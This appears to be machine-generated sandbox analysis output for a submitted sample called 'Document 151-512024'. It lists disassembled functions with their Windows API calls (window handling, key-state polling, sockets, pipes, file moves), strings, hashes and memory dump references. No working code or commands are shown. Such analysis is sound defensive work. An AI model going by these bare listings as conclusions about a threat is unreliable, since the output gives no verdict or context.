API String ID: 1324828854-0
Opcode ID: 3d9155dfac83fd8df6582220154cb96bdbd057b7d7806b283ec9276e6964cb50
Instruction ID: 85d237bb077e45d7faed41ab35aa740ae83b11da2a81ae2cb6a82c054e392b44
Opcode Fuzzy Hash: 3d9155dfac83fd8df6582220154cb96bdbd057b7d7806b283ec9276e6964cb50
Instruction Fuzzy Hash: 3F51D6B2A0064A9FDB10CFA8D845AEEBBF9EF09300F15851EF559E7291D770DA41CB60

Function 009D6B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 009D6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 009D6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 009D6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,009BAB79,00000000,00000000), ref: 009D6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 009D6CC7

Strings

0n, xrefs: 009D6BB0, 009D6C55

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID: 0n
API String ID: 3688381893-3368625520
Opcode ID: e2789aacdcba1970f4df53b15d6d64eb4402e0a6ba4a49c53bae0f41a52478be
Instruction ID: 473164b7a2371138adc24db000eb7d6595d9418b516d8d9d812a2d5abaf1f274
Opcode Fuzzy Hash: e2789aacdcba1970f4df53b15d6d64eb4402e0a6ba4a49c53bae0f41a52478be
Instruction Fuzzy Hash: D2410635A94104AFDB24CF78CD58FA97BA9EB09350F14822AFAD5A73E0C375ED41DA40

Function 0095912D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00959141
ScreenToClient.USER32(00000000,?), ref: 0095915E
GetAsyncKeyState.USER32(00000001), ref: 00959183
GetAsyncKeyState.USER32(00000002), ref: 0095919D

Strings

Se31, xrefs: 00997152

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: Se31
API String ID: 4210589936-324342673
Opcode ID: 7ff5d38c37f4b58982f46b7e7cae68352edb6d0acd994ace4c45d35ef810f969
Instruction ID: cdddb68850dd0492bb178bc72079bf7237b5e514b20c53bd464f1c8823c1dd5d
Opcode Fuzzy Hash: 7ff5d38c37f4b58982f46b7e7cae68352edb6d0acd994ace4c45d35ef810f969
Instruction Fuzzy Hash: 4A418D71A0C61AEBDF15DFA8C844BEEB774FB45321F208216E825A2290CB346954CB91

Function 00962D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00962D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00962D53
_ValidateLocalCookies.LIBCMT ref: 00962DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00962E0C
_ValidateLocalCookies.LIBCMT ref: 00962E61

Strings

csm, xrefs: 00962DF6

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3e5702b5a810b288deb3652fefdd0952bfae9b5b794ab20dc12fc215771b853d
Instruction ID: da9b809b45ff5b676788b04d3003e7b1418d1e682df1f51fcc4d14fc61b89086
Opcode Fuzzy Hash: 3e5702b5a810b288deb3652fefdd0952bfae9b5b794ab20dc12fc215771b853d
Instruction Fuzzy Hash: A641C334A00609ABCF10DF68C855ADEBBB9BF85364F148565E8146B392D735AE01CBD0

Function 009C10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009C307A
Part of subcall function 009C304E: _wcslen.LIBCMT ref: 009C309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009C1112
WSAGetLastError.WSOCK32 ref: 009C1121
WSAGetLastError.WSOCK32 ref: 009C11C9
closesocket.WSOCK32(00000000), ref: 009C11F9

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 308c753bf5119dbdd9ca7ebd3c8498859a17f5f9519ebacf56839ce5141e3260
Instruction ID: bb3a9c6f4bbb54307072de0809b44a27d4cbd8bfda834fdf2ad79ea53647bbf9
Opcode Fuzzy Hash: 308c753bf5119dbdd9ca7ebd3c8498859a17f5f9519ebacf56839ce5141e3260
Instruction Fuzzy Hash: AD412571A04205AFDB109F14C884FA9B7E9EF86324F188159FD159B292C778ED81CBE6

Function 009ACF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ACF22,?), ref: 009ADDFD

Part of subcall function 009ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ACF22,?), ref: 009ADE16

lstrcmpiW.KERNEL32(?,?), ref: 009ACF45
MoveFileW.KERNEL32(?,?), ref: 009ACF7F
_wcslen.LIBCMT ref: 009AD005
_wcslen.LIBCMT ref: 009AD01B
SHFileOperationW.SHELL32(?), ref: 009AD061

Strings

\*.*, xrefs: 009ACFF3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 57e28d1d6985a290299708796ed9248f0ae6a01f5d3ceb42875e4bdc6045f494
Instruction ID: e5dfcd33a7a8313db72132ffc173a4b53716ef55f5249a9d68f3c652b71157e8
Opcode Fuzzy Hash: 57e28d1d6985a290299708796ed9248f0ae6a01f5d3ceb42875e4bdc6045f494
Instruction Fuzzy Hash: 4A4137B19462195FDF12EFA4D981FDEB7BDAF49380F1004E6E505EB141EB34A684CB90

Function 009A7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009A7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009A778F
SysAllocString.OLEAUT32(00000000), ref: 009A7792
SysAllocString.OLEAUT32(?), ref: 009A77B0
SysFreeString.OLEAUT32(?), ref: 009A77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 009A77DE
SysAllocString.OLEAUT32(?), ref: 009A77EC

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 10e7a9331290dcdcdf4a278f89105b6be37b57b39de6c18d9713180d09d90115
Instruction ID: fd67ee78e911a1a23bda0409041a560f56fb6f2bcf4f63266c4f269c3ed685b6
Opcode Fuzzy Hash: 10e7a9331290dcdcdf4a278f89105b6be37b57b39de6c18d9713180d09d90115
Instruction Fuzzy Hash: D621C476609219AFDF10DFE8CC89DBBB3ACEB0A3647008526F904DB160D670DC85C7A0

Function 009A77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009A7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009A7868
SysAllocString.OLEAUT32(00000000), ref: 009A786B
SysAllocString.OLEAUT32 ref: 009A788C
SysFreeString.OLEAUT32 ref: 009A7895
StringFromGUID2.OLE32(?,?,00000028), ref: 009A78AF
SysAllocString.OLEAUT32(?), ref: 009A78BD

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1b9966d199ffe8035baacd235a930c27229317883d02ba7cc9d09ac1eeaaf6df
Instruction ID: e998253619810f919feaf50089dd2b69610638b8e37369df1ff42f5b467a6689
Opcode Fuzzy Hash: 1b9966d199ffe8035baacd235a930c27229317883d02ba7cc9d09ac1eeaaf6df
Instruction Fuzzy Hash: 90219071609205BFDB109FECDC89DAAB7ACEF0A3607108125F915CB2A5D678DC81DBA4

Function 009B04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009B04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009B052E

Strings

nul, xrefs: 009B0567

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 831b88b3800151aac4a0aeff1f10fcf4fdb2a204edd6135f3a466262bffcf42a
Instruction ID: 60f42d381bbc382387c3aae2c5df4982779af8b4a840c50528e56979ead85428
Opcode Fuzzy Hash: 831b88b3800151aac4a0aeff1f10fcf4fdb2a204edd6135f3a466262bffcf42a
Instruction Fuzzy Hash: 972151B5500305AFDB309F6ADD48A9B77A8BF84774F204A19F9A1D61E0D7B0D950DF20

Function 009B05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009B05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009B0601

Strings

nul, xrefs: 009B0639

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: bbd5988ad39b31ca82eb10d36c3de13f0c9c2115ba0ea8736f8fa2115c499f60
Instruction ID: 5555ae6129d989e9febf72e5f997a8dc2cdb1a9b4504b04b3ed26643615b0420
Opcode Fuzzy Hash: bbd5988ad39b31ca82eb10d36c3de13f0c9c2115ba0ea8736f8fa2115c499f60
Instruction Fuzzy Hash: E0216D75540206DBDB209F699904ADB77E8BFD5770F200B19F9A1E72E0D6B098A0CB10

Function 009D40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0094600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0094604C
Part of subcall function 0094600E: GetStockObject.GDI32(00000011), ref: 00946060
Part of subcall function 0094600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009D4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009D411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009D412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009D4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009D4145

Strings

Msctls_Progress32, xrefs: 009D40E3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: d8d5027ffe90bcfcc92ecc382475fc0a44257c893740fefe5f6b9f90a1995787
Instruction ID: 3d96b65dc0ed889a666fc746ded83930b0331dd49729fbc60e474ecab9befc34
Opcode Fuzzy Hash: d8d5027ffe90bcfcc92ecc382475fc0a44257c893740fefe5f6b9f90a1995787
Instruction Fuzzy Hash: 5A1193B1190119BFEF118E64CC85EE77F6DEF18798F008111B718A2190C6729C61DBA4

Function 0095990E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009598CC
SetTextColor.GDI32(?,?), ref: 009598D6
SetBkMode.GDI32(?,00000001), ref: 009598E9
GetStockObject.GDI32(00000005), ref: 009598F1
GetWindowLongW.USER32(?,000000EB), ref: 00959952

Strings

0n, xrefs: 00959960

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID: 0n
API String ID: 1860813098-3368625520
Opcode ID: 53465cde822c0a60f1e70550fc3a82af9024ec4b8345d033f989c3b4f1a7907a
Instruction ID: 03701a48b248c345c7e091948b09b07d41dd5fe63091e58b8f607388814e5d7f
Opcode Fuzzy Hash: 53465cde822c0a60f1e70550fc3a82af9024ec4b8345d033f989c3b4f1a7907a
Instruction Fuzzy Hash: F521783118A251DFDB12CF25EC64AE53F68EF13331B08018EF9928B0A2C7354985DB51

Function 0097D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0097D7A3: _free.LIBCMT ref: 0097D7CC

_free.LIBCMT ref: 0097D82D

Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0

_free.LIBCMT ref: 0097D838
_free.LIBCMT ref: 0097D843
_free.LIBCMT ref: 0097D897
_free.LIBCMT ref: 0097D8A2
_free.LIBCMT ref: 0097D8AD
_free.LIBCMT ref: 0097D8B8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: f1ca1309c00d26fde3a8e9d999a4b05ae2666b8433a1dbc71340a3486b79f6a2
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 8B1151B3542B04AAE521BFB4CC47FCBBBEC6FC0700F448825B29DA6092DA65B5454650

Function 009ADA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009ADA74
LoadStringW.USER32(00000000), ref: 009ADA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009ADA91
LoadStringW.USER32(00000000), ref: 009ADA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 009ADADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 009ADAB9

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: e65282bc830ab71be07fca66e40832e3572687190613dd630b3461aa38166d20
Instruction ID: 1acd326b74e93b421afde42024d205f17f870ca982fe59016b31f150975536fb
Opcode Fuzzy Hash: e65282bc830ab71be07fca66e40832e3572687190613dd630b3461aa38166d20
Instruction Fuzzy Hash: 9B0181F29542197FEB10ABE0DD89EEB336CEB09305F404992B746E2041EA749EC49F74

Function 009B096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00ECF9E0,00ECF9E0), ref: 009B097B
EnterCriticalSection.KERNEL32(00ECF9C0,00000000), ref: 009B098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 009B099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009B09A9
CloseHandle.KERNEL32(00000000), ref: 009B09B8
InterlockedExchange.KERNEL32(00ECF9E0,000001F6), ref: 009B09C8
LeaveCriticalSection.KERNEL32(00ECF9C0), ref: 009B09CF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 102b60faa15029209367799d8580243ca07df7854a220c038fc4256541936ceb
Instruction ID: 6f1ce50878bf92d4829f795c7d61263d2be34519e006cc036c0ab72e24a5788e
Opcode Fuzzy Hash: 102b60faa15029209367799d8580243ca07df7854a220c038fc4256541936ceb
Instruction Fuzzy Hash: 63F0197249BA13ABD7515BA4EE88BD6BB29BF41752F402126F202908A0C77494A5DF90

Function 009C1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 009C1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009C1DE1
WSAGetLastError.WSOCK32 ref: 009C1DF2
htons.WSOCK32(?,?,?,?,?), ref: 009C1EDB
inet_ntoa.WSOCK32(?), ref: 009C1E8C

Part of subcall function 009A39E8: _strlen.LIBCMT ref: 009A39F2

Part of subcall function 009C3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,009BEC0C), ref: 009C3240

_strlen.LIBCMT ref: 009C1F35

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 2eea18f842e647288ff8344e8f41eb150ecf4d8a59c9d0f9bf1832eb0547bc4d
Instruction ID: fe990440146dc390908baaa0d8d397e2ab5400e27fecff3d01212323fcf7eb9a
Opcode Fuzzy Hash: 2eea18f842e647288ff8344e8f41eb150ecf4d8a59c9d0f9bf1832eb0547bc4d
Instruction Fuzzy Hash: 1DB1AD71604300AFD324DF24C895F2A77A9AFC6318F54894CF45A5B2A3DB31ED46CB92

Function 009701B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 009700BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009700D6
__allrem.LIBCMT ref: 009700ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097010B
__allrem.LIBCMT ref: 00970122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00970140

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: ccea05f44b400d8e2ef21c290fbfdd4dae4126d6c5e889cef3aa3470059d7890
